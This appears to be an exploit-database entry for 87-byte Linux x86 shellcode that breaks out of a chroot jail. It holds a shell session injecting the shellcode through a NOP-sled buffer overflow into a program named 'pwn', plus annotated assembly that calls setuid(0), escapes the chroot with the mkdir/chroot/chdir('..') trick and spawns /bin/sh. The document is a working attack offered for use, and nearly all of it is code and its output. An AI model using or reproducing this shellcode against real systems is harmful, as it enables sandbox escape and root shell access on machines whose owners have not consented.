linux/x86 break chroot 87 bytes

===============================
linux/x86 break chroot 87 bytes
===============================

bt:/# ./pwn `perl -e 'print "\x90"x181 . "\xb0\x17\x31\xdb\xcd\x80\xb0\x27\x31\xdb\x53\x6a\x2e\x66\x68\x2e\x2e\x89\xe3\x66\xb9\xc0\x01\xcd\x80\xb0\x3d\x89\xe3\xcd\x80\x66\x5a\x31\xc9\x51\x66\x52\xb1\x64\xb0\x0c\x89\xe3\xcd\x80\xe2\xf8\xb0\x3d\x31\xc9\x88\x4c\x24\x01\x89\xe3\xcd\x80\xb0\x0b\x31\xc9\x51\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x31\xd2\xcd\x80\xb0\x01\x31\xdb\xcd\x80" . "\xa3\xf6\xff\xbf"'`
perl: warning: Setting locale failed.
perl: warning: Please check that your locale settings:
        LANGUAGE = (unset),
        LC_ALL = (unset),
        LANG = "en_US.UTF-8"
    are supported and installed on your system.
perl: warning: Falling back to the standard locale ("C").
[email protected]:/#
 
 
; linux/x86 break chroot 87 bytes
; [email protected]
; 2009-12-30
 
section .text
    global _start
 
_start:
    ; setuid(0);
    mov al, 23
    xor ebx, ebx
    int 0x80
 
    ; mkdir("...", 0700);
    mov al, 39
    xor ebx, ebx
    push ebx
    push byte 0x2e
    push word 0x2e2e
    mov ebx, esp
    mov cx, 0700o
    int 0x80
 
    ; chroot("...");
    mov al, 61
    mov ebx, esp
    int 0x80
 
    ; for (i = 100; i > 0; i--)
    ; {
    ;   chdir("..");
    ; }
    pop dx
    xor ecx, ecx
    push ecx
    push dx
    mov cl, 100
    up:
        mov al, 12
        mov ebx, esp
        int 0x80
    loop up
 
    ; chroot(".");
    mov al, 61
    xor ecx, ecx
    mov [esp + 1], cl
    mov ebx, esp
    int 0x80
 
    ; execve("//bin/sh", NULL, NULL);
    mov al, 11
    xor ecx, ecx
    push ecx
    push dword 0x68732f6e
    push dword 0x69622f2f
    mov ebx, esp
    xor edx, edx
    int 0x80
 
    ; exit(0);
    mov al, 1
    xor ebx, ebx
    int 0x80



#  0day.today [2018-04-04]  #